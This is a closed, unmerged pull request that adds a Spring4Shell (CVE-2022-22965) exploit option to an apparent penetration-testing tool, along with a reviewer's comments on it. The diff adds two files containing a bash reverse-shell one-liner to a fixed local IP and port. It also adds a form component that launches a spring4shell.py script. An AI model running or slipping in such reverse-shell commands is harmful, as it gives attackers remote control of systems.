### PR TITLE
CVE 2022 22965 spring4 shell

### PR DESCRIPTION
**Pull request by tjmat1**
Spring4Shell Exploit CVE 2022 22965 

Attack Vector added.
Tested using Docker container - exploit works successfully.
Added to References.

Screenshot 2022-09-20 002739

### CODE REVIEW

File: src-tauri/8235a9b2e3d041d4/2ed059aafa068993 [hunk 1]
```diff
@@ -0,0 +1 @@
+bash -i >& /dev/tcp/192.168.100.4/4444 0>&1
```
Comment (Huskehhh) [inline src-tauri/8235a9b2e3d041d4/2ed059aafa068993:1]: Move to a different file - or provide instruction so the user can set up a reverse shell separate to the DDT application

File: src-tauri/d9964c1934447cdd/7f8f95555fdde918 [hunk 2]
```diff
@@ -0,0 +1 @@
+bash -i >& /dev/tcp/192.168.100.4/4444 0>&1
```
Comment (Huskehhh) [inline src-tauri/d9964c1934447cdd/7f8f95555fdde918:1]: Ditto. Read above.

File: src-tauri/8235a9b2e3d041d4/2ed059aafa068993 (hunk 1 above)
Comment (Huskehhh) [reply src-tauri/8235a9b2e3d041d4/2ed059aafa068993:1]: The IP should also not be fixed here.

File: src/components/CVE-2022-22965/CVE-2022-22965.tsx [hunk 3]
```diff
@@ -0,0 +1,103 @@
...
+            hostPort: 4444,
+        },
+    });
+
+    const onSubmit = async (values: FormValues) => {
+        setLoading(true);
+
+        const args = [
+            "/usr/share/ddt/spring4shell/spring4shell.py",
+
```
Comment (Huskehhh) [inline src/components/CVE-2022-22965/CVE-2022-22965.tsx:35]: unnecessary spacing

**Comment by JiatengTao** [comment]
Close this PR as it's from T2 2022

**Pull request closed without merging**